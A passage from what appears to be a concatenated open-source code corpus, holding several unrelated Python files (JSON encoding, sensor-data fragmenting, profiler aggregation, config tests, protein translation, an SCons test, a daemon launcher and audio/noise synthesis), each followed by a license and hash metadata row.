url = "http://%s:%s/render/?%s" % (SETTINGS['GRAPHITE_HOST'], SETTINGS['GRAPHITE_PORT'], urlencode(query))
headers, content = HTTP.request(url, "GET")
return content
class EnhancedJSONEncoder(DjangoJSONEncoder):
"""
Custom JSON encoder which can serialize MongoDB's ObjectId objects.
"""
def default(self, o, **kwargs):
if isinstance(o, ObjectId):
return str(o)
else:
return DjangoJSONEncoder.default(self, o, **kwargs)
def json(data, status=200):
data = simplejson.dumps(data, cls=EnhancedJSONEncoder, separators=(',', ':'))
return HttpResponse(data, mimetype='application/json', status=status)
| bsd-3-clause | 345,892,791,650,336,500 | 25.856061 | 108 | 0.667137 | false |
petr-devaikin/dancee | helpers/extractor.py | 1 | 5790 | # Cut the experiment session in small fragments
# Input: ../bin/data/records/{session}/body.csv and skeletok.csv
# Output: fragments/{fragment_number}.json and fragments/log.csv
import os
import numpy
import json
DELAY = 15
LENGTH = 30
OVERLAP = 0.719999
FREQUENCY = 60
MARGIN = 5
FREQUENCY = 60
CUTOFF_FREQUENCY = 10
buf_length = FREQUENCY / CUTOFF_FREQUENCY
kernel = numpy.blackman(buf_length)
kernel_summ = numpy.sum(kernel)
to_filter = [
9, 10, 11, #r_shoulder
12, 13, 14, #r_elbow
15, 16, 17, #r_hand
18, 19, 20, #l_shoulder
21, 22, 23, #l_elbow
24, 25, 26, #l_hand
27, 28, 29, #r_hip
30, 31, 32, #r_knee
36, 37, 38, #r_foot
39, 40, 41, #l_hip
42, 43, 44, #l_knee
48, 49, 50 #l_foot
]
buffers = [[0] * buf_length] * len(to_filter)
values = [0] * len(to_filter)
values2 = [0] * len(to_filter)
# emg filtering
CUTOFF_EMG_FREQUENCY = 6
buf_emg_length = FREQUENCY / CUTOFF_EMG_FREQUENCY
kernel_emg = numpy.blackman(buf_emg_length)
kernel_emg_summ = numpy.sum(kernel_emg)
emg2_buffer = [0] * buf_emg_length
# acc filtering
CUTOFF_ACC_FREQUENCY = 10
buf_acc_length = FREQUENCY / CUTOFF_ACC_FREQUENCY
kernel_acc = numpy.blackman(buf_acc_length)
kernel_acc_summ = numpy.sum(kernel_acc)
acc_buffer = [[0] * buf_acc_length] * 3
# clean the folder
for f in os.listdir("fragments"):
os.remove(os.path.join('fragments', f))
# cut fragments
record_counter = 0
def cut_fragment(participant, track_number):
global record_counter
global values
global values2
global buffers
global emg2_buffer
global acc_buffer
print "Cut participant " + participant + ", track " + str(track_number)
result_data = {
'acc1': [],
'acc2': [],
'acc2_nf': [],
'emg1': [],
'emg2': [],
'emg2_nf': [],
'skeleton': [],
'skeleton_nf': [],
}
path = "../bin/data/records/"
for rec in os.listdir(path):
if rec.split(' ')[0] == participant:
with open(path + rec + "/body.csv", 'r') as f_read_body:
with open(path + rec + "/skeleton.csv", 'r') as f_read_skeleton:
i = 0
while i < (DELAY + (OVERLAP + LENGTH) * (track_number + 1) - MARGIN) * FREQUENCY:
line_body = f_read_body.readline().strip().split('\t')
line_skeleton = f_read_skeleton.readline().strip().split('\t')
values3 = [0] * len(to_filter)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number) * FREQUENCY:
values = [float(line_skeleton[j]) for j in to_filter]
for j in range(2, len(values), 3):
if values[j] > 1.4:
values2[j - 2] = values[j - 2]
values2[j - 1] = values[j - 1]
values2[j] = values[j]
for j in range(len(values)):
buffers[j].append(values2[j])
buffers[j] = buffers[j][1:]
for k in range(buf_length):
values3[j] += buffers[j][k] * kernel[k]
values3[j] /= kernel_summ
#emg filtering
emg2 = float(line_body[7])
emg2_nf = emg2
emg2_buffer.append(emg2)
emg2_buffer = emg2_buffer[1:]
emg2 = 0
for k in range(buf_emg_length):
emg2 += emg2_buffer[k] * kernel_emg[k]
emg2 /= kernel_emg_summ
line_body[7] = str(emg2)
#acc filtering
acc_values = [float(v) for v in line_body[3:6]]
for j in range(3):
v = float(line_body[3 + j])
acc_buffer[j].append(v)
acc_buffer[j] = acc_buffer[j][1:]
v2 = 0
for k in range(buf_acc_length):
v2 += acc_buffer[j][k] * kernel_acc[k]
v2 /= kernel_acc_summ
line_body[j + 3] = str(v2)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number + MARGIN) * FREQUENCY:
result_data['acc1'].append([float(v) - 512 for v in line_body[0:3]])
result_data['acc2'].append([float(v) - 512 for v in line_body[3:6]])
result_data['acc2_nf'].append(acc_values)
result_data['emg1'].append(float(line_body[6]))
result_data['emg2'].append(float(line_body[7]))
result_data['emg2_nf'].append(emg2_nf)
result_data['skeleton'].append({
'r_shoulder': values3[0:3],
'r_elbow': values3[3:6],
'r_hand': values3[6:9],
'l_shoulder': values3[9:12],
'l_elbow': values3[12:15],
'l_hand': values3[15:18],
'r_hip': values3[18:21],
'r_knee': values3[21:24],
'r_foot': values3[24:27],
'l_hip': values3[27:30],
'l_knee': values3[30:33],
'l_foot': values3[33:36]
})
result_data['skeleton_nf'].append({
'r_shoulder': values[0:3],
'r_elbow': values[3:6],
'r_hand': values[6:9],
'l_shoulder': values[9:12],
'l_elbow': values[12:15],
'l_hand': values[15:18],
'r_hip': values[18:21],
'r_knee': values[21:24],
'r_foot': values[24:27],
'l_hip': values[27:30],
'l_knee': values[30:33],
'l_foot': values[33:36]
})
i += 1
with open('fragments/' + str(record_counter) + '.json', "w") as f_write:
json.dump(result_data, f_write)
break
else:
print "Cannot find data for participant ", participant, "\n"
return None
record_counter += 1
return record_counter - 1
with open('selftest/results.txt', 'r') as f:
with open('fragments/log.csv', 'w') as log:
log.write('Participant\tTrack number\tTrack order\tValence\tArousal\tFragment\n')
participant = -1
track_number = 0
for line in f:
ar = line.strip().split(' ');
if ar[0] != participant:
track_number = 0
participant = ar[0]
track_real_number = ar[1]
valence = ar[2]
arousal = ar[3]
record = cut_fragment(participant, track_number)
log.write(participant + '\t' + track_real_number + '\t' + str(track_number) + '\t' + valence + '\t' + arousal + '\t' + str(record) + '\n')
track_number += 1
#break
| gpl-3.0 | -8,201,075,262,819,803,000 | 25.199095 | 141 | 0.580656 | false |
quantumgraph/qgprofiler | qgprofiler/qg_profile_aggregator.py | 1 | 4240 | from node import Node, NodeList
from .qg_profiler import QGProfiler
from .helper import get_real_file_path, get_file_type, xml_scanner, read_attributes_from_xml, merge_attributes
import glob
import json
class QGProfileAggregator(object):
def __init__(self, in_file_path, out_file_path):
self.root_node = Node('i_am_root', None, {})
self.in_file_path = get_real_file_path(in_file_path)
get_file_type(out_file_path)
self.out_file_path = get_real_file_path(out_file_path)
def add_json(self, _json):
new_node = self.make_node_from_json(_json, self.root_node)
new_node_list = NodeList()
new_node_list.append(new_node)
self.merge_node_list_to_node(self.root_node, new_node_list)
def merge_node_list_to_node(self, main_node, node_list):
for node in node_list:
index = main_node.is_child_in_children(node.get_name())
if index == -1:
main_node.add_child(node)
else:
existing_node = main_node.get_child(index)
existing_node.increment_value_by(node.get_value())
existing_node.increment_count_by(node.get_count())
existing_node.set_aggregate_attr(merge_attributes(node.get_aggregate_attr(), existing_node.get_aggregate_attr()))
existing_node.update_over_head(node.get_over_head())
self.merge_node_list_to_node(existing_node, node.get_children())
def make_node_from_json(self, _json, parent_node):
name = _json['name']
value = _json['value']
count = _json['count']
children = _json['children']
attributes = _json.get('attributes', {})
over_head = _json.get('overhead', 0)
new_node = Node(name, parent_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
for child in children:
child_node = self.make_node_from_json(child, new_node)
new_node.add_child(child_node)
return new_node
def add_xml(self, _xml):
current_node = self.root_node
xml_gen = xml_scanner(_xml)
for each in xml_gen:
if each[0] == 'START':
name = str(each[2]['name'])
value = float(each[2]['value'])
count = int(each[2]['count'])
over_head = float(each[2].get('overhead', 0))
attributes = read_attributes_from_xml(each[2].get('attributes', {}))
index = current_node.is_child_in_children(name)
if index == -1:
new_node = Node(name, current_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
current_node.add_child(new_node)
current_node = new_node
else:
current_node = current_node.get_child(index)
current_node.increment_value_by(value)
current_node.increment_count_by(count)
current_node.set_aggregate_attr(merge_attributes(attributes, current_node.get_aggregate_attr()))
current_node.update_over_head(over_head)
elif each[0] == 'END':
current_node = current_node.get_parent()
def generate_file(self, rounding_no=6):
for file_path in glob.iglob(self.in_file_path):
filename = file_path.split('/')[-1]
if filename.endswith('.json'):
with open(file_path, 'r') as f:
raw_json = f.read()
_json = json.loads(raw_json)
self.add_json(_json)
elif filename.endswith('.xml'):
with open(file_path, 'r') as f:
_xml = f.read()
self.add_xml(_xml)
qg_profiler = QGProfiler('test', self.out_file_path)
if len(self.root_node.get_children()) == 1:
qg_profiler.root_node = self.root_node.get_child(0)
else:
qg_profiler.root_node = self.root_node
qg_profiler.generate_file(rounding_no)
| mit | 7,139,093,304,680,659,000 | 43.631579 | 129 | 0.556132 | false |
henriquebastos/django-decouple | tests/test_env.py | 1 | 1790 | # coding: utf-8
import os
import sys
from mock import patch
import pytest
from decouple import Config, RepositoryEnv, UndefinedValueError
# Useful for very coarse version differentiation.
PY3 = sys.version_info[0] == 3
if PY3:
from io import StringIO
else:
from StringIO import StringIO
ENVFILE = '''
KeyTrue=True
KeyOne=1
KeyYes=yes
KeyOn=on
KeyFalse=False
KeyZero=0
KeyNo=no
KeyOff=off
#CommentedKey=None
PercentNotEscaped=%%
NoInterpolation=%(KeyOff)s
'''
@pytest.fixture(scope='module')
def config():
with patch('decouple.open', return_value=StringIO(ENVFILE), create=True):
return Config(RepositoryEnv('.env'))
def test_env_comment(config):
with pytest.raises(UndefinedValueError):
config('CommentedKey')
def test_env_percent_not_escaped(config):
assert '%%' == config('PercentNotEscaped')
def test_env_no_interpolation(config):
assert '%(KeyOff)s' == config('NoInterpolation')
def test_env_bool_true(config):
assert True == config('KeyTrue', cast=bool)
assert True == config('KeyOne', cast=bool)
assert True == config('KeyYes', cast=bool)
assert True == config('KeyOn', cast=bool)
def test_env_bool_false(config):
assert False == config('KeyFalse', cast=bool)
assert False == config('KeyZero', cast=bool)
assert False == config('KeyNo', cast=bool)
assert False == config('KeyOff', cast=bool)
def test_env_os_environ(config):
os.environ['KeyFallback'] = 'On'
assert True == config('KeyTrue', cast=bool)
assert True == config('KeyFallback', cast=bool)
del os.environ['KeyFallback']
def test_env_undefined(config):
with pytest.raises(UndefinedValueError):
config('UndefinedKey')
def test_env_default_none(config):
assert None is config('UndefinedKey', default=None)
| mit | 7,651,317,815,058,912,000 | 23.520548 | 77 | 0.703911 | false |
macmanes-lab/MCBS913 | code/Junhong Chen/generateProtineSeq.py | 1 | 4902 | """
Author: Junhong Chen
"""
from Bio.Alphabet import IUPAC
from Bio.Seq import Seq
from Bio import SeqIO
from sys import argv
import os
path = argv[1]
class CDS:
def __init__(self,gff):
self.data = dict()
self.fname = gff
def parse(self):
file = open(self.fname,"r")
for elem in file:
if "CDS" in elem:
tmp = elem.split()
ind = tmp.index("CDS")
if tmp[0] in self.data:
self.data[tmp[0]].append((int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4]))
else:
self.data[tmp[0]] = [(int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4])]
def getContigName(self):
return self.data.keys()
def getContigNumber(self):
return len(self.data)
def getContigCDSIndex(self,name):
if name in self.data:
return self.data[name]
else:
print "No indices for that contig ID: ", name
#return self.data[name.split(".")[0]]
def getContigCDSSize(self,name):
return len(self.getContigCDSIndex(name))
class RefSeq:
def __init__(self,fast):
self.fname = fast
self.data = dict()
self.result = dict()
self.cds = CDS(fast.split(".")[0]+".gff")
def parse(self):
fast = SeqIO.parse(open(self.fname),"fasta")
for elem in fast:
tmp = elem.id.split("|")[3]
if tmp in self.data:
print "ATTENTION: same contig ID in: " + self.fname
else:
self.data[tmp] = str(elem.seq)
def getContigSeq(self,name):
if name in self.data:
return self.data[name]
else:
print "Can NOT find the contig: "+name
def getContigData(self):
return self.data
def getContigID(self):
return self.data.keys()
def getContigCDSSize(self,name):
return self.cds.getContigCDSSize(name)
def translate(self,mode = IUPAC.ambiguous_dna):
self.cds.parse()
contig = self.data.keys()
for name in contig:
ind = self.cds.getContigCDSIndex(name)
sq = self.data[name]
ret = []
for tup in ind:
myseq = sq[tup[0]-1:tup[1]]
#store Seq Object
if tup[2] == "+":
ret.append(Seq(myseq, mode).translate())
else:
ret.append(Seq(myseq, mode).reverse_complement().translate())
self.result[name] = ret
return self.result
def getCDSSeq(self,name,index):
sq = self.data[name]
ind = self.cds.getContigCDSIndex(name)[index]
print self.cds.getContigName();
return sq[ind[0]-1:ind[1]]
def compareProtineSeq(path):
refd = RefSeq(path+".fastd")
refd.parse()
refa = RefSeq(path+".fasta")
refa.parse()
refat = refa.translate()
refdt = refd.translate()
#print refat["NC_008752.1"][3]
#print refdt["NC_008752.1"][3]
#print refa.getCDSSeq("NC_008752.1",3)
#print refd.getCDSSeq("NC_008752.1",3)
id = refd.getContigID()
ret = dict()
for name in id:
mis = []
l = refa.getContigCDSSize(name)
stat = 0
for i in range(l):
if refat[name][i] in refdt[name][i]:
stat = stat + 1
else:
mis.append(i)
ret[name] = (l,stat,mis)
def sum(x):
ret = 0.
for el in x:
ret = ret + el*1.
return ret
mis = [x[1] for x in ret.values()]
tot = [x[0] for x in ret.values()]
return sum(mis)/sum(tot)
#return ret
def getFilesinCWD(path):
if path[-1] is not "/":
path = path + "/"
ref = []
files = [f for f in os.listdir(path)]
for i in range(1,5):
for fo in files:
f = fo.split(".")[0]
if f not in ref and f.startswith(str(i)+"-"):
ref.append(f)
ret = [path+tp for tp in ref]
return ret
def doCompare(path):
fpath = getFilesinCWD(path)
retp = [f.split("/")[-1] for f in fpath]
ret = []
for p in fpath:
ret.append(compareProtineSeq(p))
return retp,ret
if __name__ == "__main__":
print doCompare(path)
##refa = RefSeq(path+".fasta")
#refa.parse()
#print refa.getCDSSeq("NC_008752",0)
| mit | -7,779,518,581,467,217,000 | 20.5 | 90 | 0.467768 | false |
EmanueleCannizzaro/scons | test/Scanner/Scanner.py | 1 | 7353 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Scanner/Scanner.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('build.py', r"""
import sys
input = open(sys.argv[1], 'rb')
output = open(sys.argv[2], 'wb')
def process(infp, outfp):
for line in infp.readlines():
if line[:8] == 'include ':
file = line[8:-1]
process(open(file, 'rb'), outfp)
elif line[:8] == 'getfile ':
outfp.write('include ')
outfp.write(line[8:])
# note: converted, but not acted upon
else:
outfp.write(line)
process(input, output)
sys.exit(0)
""")
# Execute a subsidiary SConscript just to make sure we can
# get at the Scanner keyword from there.
test.write('SConstruct', """
SConscript('SConscript')
""")
test.write('SConscript', """
import re
include_re = re.compile(r'^include\s+(\S+)$', re.M)
def kfile_scan(node, env, scanpaths, arg):
contents = node.get_text_contents()
includes = include_re.findall(contents)
return includes
kscan = Scanner(name = 'kfile',
function = kfile_scan,
argument = None,
skeys = ['.k'])
env = Environment(K2SCAN=kfile_scan)
k2scan = env.Scanner(name = 'k2',
# We'd like to do the following, but it will take
# some major surgery to subst() and subst_list(),
# so comment it out for now.
# function = '$K2SCAN',
function = kfile_scan,
argument = None,
skeys = ['.k2'])
##########################################################
# Test scanner as found automatically from the environment
# (backup_source_scanner)
env = Environment()
env.Append(SCANNERS = kscan)
env.Command('foo', 'foo.k', r'%(_python_)s build.py $SOURCES $TARGET')
##########################################################
# Test resetting the environment scanners (and specifying as a list).
env2 = env.Clone()
env2.Append(SCANNERS = [k2scan])
env2.Command('junk', 'junk.k2', r'%(_python_)s build.py $SOURCES $TARGET')
##########################################################
# Test specifying a specific source scanner for a target Node
barbld = Builder(action=r'%(_python_)s build.py $SOURCES $TARGET',
source_scanner=kscan)
env.Append(BUILDERS={'BarBld':barbld})
bar = env.BarBld(target='bar', source='bar.in')
##########################################################
# Test specifying a source scanner for a Builder that gets
# automatically applied to targets generated from that Builder
def blork(env, target, source):
open(str(target[0]), 'wb').write(
source[0].get_text_contents().replace('getfile', 'MISSEDME'))
kbld = Builder(action=r'%(_python_)s build.py $SOURCES $TARGET',
src_suffix='.lork',
suffix='.blork',
source_scanner=kscan)
blorkbld = Builder(action=blork,
src_suffix='.blork',
suffix='.ork')
env.Append(BUILDERS={'BLORK':blorkbld, 'KB':kbld})
blork = env.KB('moo.lork')
ork = env.BLORK(blork)
Alias('make_ork', ork)
""" % locals())
test.write('foo.k',
"""foo.k 1 line 1
include xxx
include yyy
foo.k 1 line 4
""")
test.write('bar.in',
"""include yyy
bar.in 1 line 2
bar.in 1 line 3
include zzz
""")
test.write('junk.k2',
"""include yyy
junk.k2 1 line 2
junk.k2 1 line 3
include zzz
""")
test.write('moo.lork',
"""include xxx
moo.lork 1 line 2
include yyy
moo.lork 1 line 4
include moo.inc
""")
test.write('moo.inc',
"""getfile zzz
""")
test.write('xxx', "xxx 1\n")
test.write('yyy', "yyy 1\n")
test.write('zzz', "zzz 1\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py bar.in bar
%(_python_)s build.py foo.k foo
%(_python_)s build.py junk.k2 junk
%(_python_)s build.py moo.lork moo.blork
blork(["moo.ork"], ["moo.blork"])
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 1\nyyy 1\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 1\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 1\n")
test.must_match('junk', "yyy 1\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 1\n")
test.must_match('moo.ork', "xxx 1\nmoo.lork 1 line 2\nyyy 1\nmoo.lork 1 line 4\ninclude zzz\n")
test.up_to_date(arguments = '.')
test.write('xxx', "xxx 2\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py foo.k foo
%(_python_)s build.py moo.lork moo.blork
blork(["moo.ork"], ["moo.blork"])
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 2\nyyy 1\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 1\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 1\n")
test.must_match('junk', "yyy 1\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 1\n")
test.must_match('moo.ork', "xxx 2\nmoo.lork 1 line 2\nyyy 1\nmoo.lork 1 line 4\ninclude zzz\n")
test.write('yyy', "yyy 2\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py bar.in bar
%(_python_)s build.py foo.k foo
%(_python_)s build.py junk.k2 junk
%(_python_)s build.py moo.lork moo.blork
blork(["moo.ork"], ["moo.blork"])
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 2\nyyy 2\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 2\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 1\n")
test.must_match('junk', "yyy 2\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 1\n")
test.must_match('moo.ork', "xxx 2\nmoo.lork 1 line 2\nyyy 2\nmoo.lork 1 line 4\ninclude zzz\n")
test.write('zzz', "zzz 2\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py bar.in bar
%(_python_)s build.py junk.k2 junk
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 2\nyyy 2\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 2\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 2\n")
test.must_match('junk', "yyy 2\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 2\n")
test.must_match('moo.ork', "xxx 2\nmoo.lork 1 line 2\nyyy 2\nmoo.lork 1 line 4\ninclude zzz\n")
test.up_to_date(arguments = 'foo')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -8,465,427,710,876,790,000 | 29.135246 | 97 | 0.629131 | false |
openre/openre | openre/agent/domain/__init__.py | 1 | 1623 | # -*- coding: utf-8 -*-
"""
Домен. Создает один процесс для одного домена openre. Получает и передает
спайки (pub), получает команды от сервера (req-rep) и пересылает результат
выполнения команды.
"""
from openre.agent.decorators import daemonize
from openre.agent.helpers import daemon_stop
import logging
import signal
from openre.agent.args import parse_args
from openre.agent.domain.args import parser
from openre.agent.domain.domain import Agent
def run():
args = parse_args(parser)
def sigterm(signum, frame):
signum_to_str = dict(
(k, v) for v, k in reversed(sorted(signal.__dict__.items()))
if v.startswith('SIG') and not v.startswith('SIG_')
)
logging.debug(
'Got signal.%s. Clean and exit.',
signum_to_str.get(signum, signum)
)
exit(0)
@daemonize(
args.pid_file,
signal_map={
signal.SIGTERM: sigterm,
signal.SIGINT: sigterm,
},
)
def start():
"""
Запуск серера
"""
logging.info('Start OpenRE.Agent domain')
agent = Agent(vars(args))
agent.run()
def stop():
"""
Остановка серера
"""
logging.info('Stop OpenRE.Agent domain')
daemon_stop(args.pid_file)
if args.action == 'start':
start()
elif args.action == 'stop':
stop()
elif args.action == 'restart':
stop()
start()
| mit | -6,384,374,142,818,930,000 | 24.413793 | 74 | 0.580054 | false |
ttm/pingosom | pingosom2.py | 1 | 50613 | #-*- coding: utf-8 -*-
import numpy as n, random, os, sys, time
from scipy.io import wavfile as w
tfoo=time.time()
H=n.hstack
V=n.vstack
f_a = 44100. # Hz, frequência de amostragem
############## 2.2.1 Tabela de busca (LUT)
Lambda_tilde=Lt=1024.*16
# Senoide
fooXY=n.linspace(0,2*n.pi,Lt,endpoint=False)
S_i=n.sin(fooXY) # um período da senóide com T amostras
# Quadrada:
Q_i=n.hstack( ( n.ones(Lt/2)*-1 , n.ones(Lt/2) ) )
# Triangular:
foo=n.linspace(-1,1,Lt/2,endpoint=False)
Tr_i=n.hstack( ( foo , foo*-1 ) )
# Dente de Serra:
D_i=n.linspace(-1,1,Lt)
def v(f=220,d=2.,tab=S_i,fv=2.,nu=2.,tabv=S_i):
if nu==13.789987:
return n.zeros(int(fa*d))
Lambda=n.floor(f_a*d)
ii=n.arange(Lambda)
Lv=float(len(tabv))
Gammav_i=n.floor((ii*fv*Lv)/f_a) # índices para a LUT
Gammav_i=n.array(Gammav_i,n.int)
# padrão de variação do vibrato para cada amostra
Tv_i=tabv[Gammav_i%int(Lv)]
# frequência em Hz em cada amostra
F_i=f*( 2.**( Tv_i*nu/12. ) )
# a movimentação na tabela por amostra
D_gamma_i=F_i*(Lt/float(f_a))
Gamma_i=n.cumsum(D_gamma_i) # a movimentação na tabela total
Gamma_i=n.floor( Gamma_i) # já os índices
Gamma_i=n.array( Gamma_i, dtype=n.int) # já os índices
return tab[Gamma_i%int(Lt)] # busca dos índices na tabela
def A(fa=2.,V_dB=10.,d=2.,taba=S_i):
# Use com: v(d=XXX)*A(d=XXX)
Lambda=n.floor(f_a*d)
ii=n.arange(Lambda)
Lt=float(len(taba))
Gammaa_i=n.floor(ii*fa*Lt/f_a) # índices para a LUT
Gammaa_i=n.array(Gammaa_i,n.int)
# variação da amplitude em cada amostra
A_i=taba[Gammaa_i%int(Lt)]
A_i=1+A_i*(1- 10.**(V_dB/20.))
return A_i
def adsr(som,A=10.,D=20.,S=-20.,R=100.,xi=1e-2):
"""Envelope ADSR com
A ataque em milissegundos,
D decay em milissegundos
S sustain, com número de decibéis a menos
R Release em milisegundos
Atenção para que a duração total é dada pelo som em si
e que a duração do trecho em sustain é a diferença
entre a duração total e as durações das partes ADR."""
a_S=10**(S/20.)
Lambda=len(som)
Lambda_A=int(A*f_a*0.001)
Lambda_D=int(D*f_a*0.001)
Lambda_R=int(R*f_a*0.001)
Lambda_S=Lambda - Lambda_A - Lambda_D - Lambda_R
ii=n.arange(Lambda_A,dtype=n.float)
A=ii/(Lambda_A-1)
A_i=A # ok
ii=n.arange(Lambda_A,Lambda_D+Lambda_A,dtype=n.float)
D=1-(1-a_S)*( ( ii-Lambda_A )/( Lambda_D-1) )
A_i=n.hstack( (A_i, D ) )
S=n.ones(Lambda-Lambda_R-(Lambda_A+Lambda_D),dtype=n.float)*a_S
A_i=n.hstack( ( A_i, S ) )
ii=n.arange(Lambda-Lambda_R,Lambda,dtype=n.float)
R=a_S-a_S*((ii-(Lambda-Lambda_R))/(Lambda_R-1))
A_i=n.hstack( (A_i,R) )
return som*A_i
triadeM=[0.,4.,7.]
def ac(f=220.,notas=[0.,4.,7.,12.],tab=Q_i,d=2.,nu=0,fv=2.):
acorde=adsr(v(tab=tab,d=d,f=f*2.**(notas[-1]/12.),nu=nu,fv=fv))
for na in notas[:-1]:
acorde+=adsr(v(tab=tab,d=d,f=f*2**(na/12.),nu=nu,fv=fv))
return acorde*10
def N(arr,xx=1.):
r=arr
r = (((r-r.min())/(r.max()-r.min()))*2-1)*xx
return n.int16(r * float(2**15-1))
def NN(arr):
return 2*((arr-arr.min())/(arr.max()-arr.min()))-1
vozes="f3,f2,f1,f5,m5,m1,m3".split(",")
def fala(frase="Semicondutor livre",ss=160):
arq=frase.split()[0]
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s110 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
os.system(u"espeak -vpt-pt+%s -w%s.wav -p99 -b=1 '%s' -s%i"%(random.sample(vozes,1)[0],arq,frase,ss))
#os.system(u"espeak "+ frase +(u" -vpt-pt+%s -w%s.wav -p99 -b=1 -s%i"%(random.sample(vozes,1)[0],arq,ss)))
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s130 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
ff=w.read("%s.wav"%(arq,))[1]
ff_=n.fft.fft(ff)
s=ff2=n.fft.ifft( n.hstack((ff_,n.zeros(len(ff_)) )) ).real
sc_aud=((s-s.min())/(s.max()-s.min()))*2.-1.
return sc_aud*10
####
# ruidos
Lambda = 100000 # Lambda sempre par
# diferença das frequências entre coeficiêntes vizinhos:
df = f_a/float(Lambda)
coefs = n.exp(1j*n.random.uniform(0, 2*n.pi, Lambda))
# real par, imaginaria impar
coefs[Lambda/2+1:] = n.real(coefs[1:Lambda/2])[::-1] - 1j * \
n.imag(coefs[1:Lambda/2])[::-1]
coefs[0] = 0. # sem bias
coefs[Lambda/2] = 1. # freq max eh real simplesmente
# as frequências relativas a cada coeficiente
# acima de Lambda/2 nao vale
fi = n.arange(coefs.shape[0])*df
f0 = 15. # iniciamos o ruido em 15 Hz
i0 = n.floor(f0/df) # primeiro coef a valer
coefs[:i0] = n.zeros(i0)
f0 = fi[i0]
# obtenção do ruído em suas amostras temporais
ruido = n.fft.ifft(coefs)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rb=r
r = n.int16(r * float(2**15-1))
w.write('branco.wav', f_a, r)
fator = 10.**(-6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# realizando amostras temporais do ruído marrom
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rm=r
r = n.int16(r * float(2**15-1))
w.write('marrom.wav', f_a, r)
### 2.53 Ruído azul
# para cada oitava, ganhamos 3dB
fator = 10.**(3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# realizando amostras temporais do ruído azul
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
ra=r
r = n.int16(r * float(2**15-1))
w.write('azul.wav', f_a, r)
### 2.54 Ruido violeta
# a cada oitava, ganhamos 6dB
fator = 10.**(6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rv=r
r = n.int16(r * float(2**15-1))
w.write('violeta.wav', f_a, r)
### 2.51 Ruído rosa
# a cada oitava, perde-se 3dB
fator = 10.**(-3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = coefs[i0:]*alphai
